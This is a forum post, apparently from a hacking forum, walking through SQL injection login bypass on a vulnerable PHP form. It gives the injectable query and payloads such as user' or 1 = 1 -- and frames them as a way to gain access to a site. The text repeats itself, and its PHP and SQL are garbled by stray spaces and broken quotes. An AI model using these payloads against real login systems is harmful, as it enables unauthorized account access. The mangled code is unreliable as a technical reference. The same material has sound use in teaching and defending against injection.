BadB
Professional
- Messages
- 1,688
- Reaction score
- 1,632
- Points
- 113
Today we will consider the possibility of bypassing authorization with SQL Injection.
SQL injection, a classic example of web vulnerabilities. In this article, we will see what SQL injection is, how it can bypass authorization, and how it works under the hood.
How authorization works
Vulnerabilities in the code.
At the beginning, the code gets the data entered by the user and puts it directly into the SQL command. It does not check what type of data is presented. Here is the SQL query used.
To identify vulnerabilities in the code, we will carry out the so-called fuzzing.
And accordingly, we get an SQL error:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near
The script takes our data and puts it in quotes. If I enter "test" as the password, then the sql query will contain password = 'test' :
Therefore, conforming to the rules of SQL syntax is incorrect. This caused the server to throw an error. Think what will happen if I add this line as input.
The request will look like:
In SQL - - or - + as a character for a comment. so if we want to comment on something or block some part of the code, we can use that. In this request, everything that follows is ignored.
But what happens if you add the following line to the SQL query:
What's interesting about the OR operator is that it tests two logical operators and, if one or both of them are true, it will return true.
So if the password is like a string test, or 1 = 1, it will return true. Since 1 is always 1 (oddly enough), this request ignores the wrong password. This is how we were able to bypass the password check.
But, what if we don't know the password or username?
We can use this string as a username and anything as a password.
Inquiry:
Since after - - the request ignores everything - it doesn't care about the password. This will give us access to the site.
SQL injection, a classic example of web vulnerabilities. In this article, we will see what SQL injection is, how it can bypass authorization, and how it works under the hood.
How authorization works
An example of a simple PHP code with authorization:
Code:
<? php
$ username = $ _POST ['username']; // Username
$ password = $ _POST ['password']; // Password
$ query = "select username, password from users where username = '. $ username.' and password = '. $ password.' limit 0.1 "; // command for request
$ result = mysql_query ($ query); // inquiry
$ rows = mysql_fetch_array ($ result); // get data
if ($ rows) // Check for correctness of data
{
echo "Login successful";
// Create Session or Set Cookies
} else {
echo "login data invalid";
}
/>Vulnerabilities in the code.
At the beginning, the code gets the data entered by the user and puts it directly into the SQL command. It does not check what type of data is presented. Here is the SQL query used.
Code:
SELECT username, password FROM users WHERE username = '$ username' AND password = '$ password' LIMIT 0,1;To identify vulnerabilities in the code, we will carry out the so-called fuzzing.
Let's try to enter the username "user" and "pass" as the password. For code, our request will look something like this:
Code:
SELECT username, password FROM users WHERE username = 'user' AND password = 'pass'' LIMIT 0,1;And accordingly, we get an SQL error:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near
Code:
'test' '' at line 1The script takes our data and puts it in quotes. If I enter "test" as the password, then the sql query will contain password = 'test' :
Code:
SELECT username, password FROM users WHERE username = 'user' AND password = 'test' LIMIT 0,1;But there is also other code after this line. ('LIMIT 0,1)
Therefore, conforming to the rules of SQL syntax is incorrect. This caused the server to throw an error. Think what will happen if I add this line as input.
Code:
test 'or 1 = 1 -The request will look like:
Code:
SELECT username, password FROM users WHERE username = 'user' AND password = 'test' or 1 = 1 - 'LIMIT 0,1;In SQL - - or - + as a character for a comment. so if we want to comment on something or block some part of the code, we can use that. In this request, everything that follows is ignored.
Code:
SELECT username, password FROM users WHERE username = 'user' AND password = 'test' or 1 = 1But what happens if you add the following line to the SQL query:
Code:
or 1 = 1What's interesting about the OR operator is that it tests two logical operators and, if one or both of them are true, it will return true.
So if the password is like a string test, or 1 = 1, it will return true. Since 1 is always 1 (oddly enough), this request ignores the wrong password. This is how we were able to bypass the password check.
But, what if we don't know the password or username?
We can use this string as a username and anything as a password.
Code:
user' or 1 = 1 --Inquiry:
Code:
SELECT username, password FROM users WHERE username = 'user' or 1 = 1 - 'AND password =' xxxx 'LIMIT 0,1;Since after - - the request ignores everything - it doesn't care about the password. This will give us access to the site.
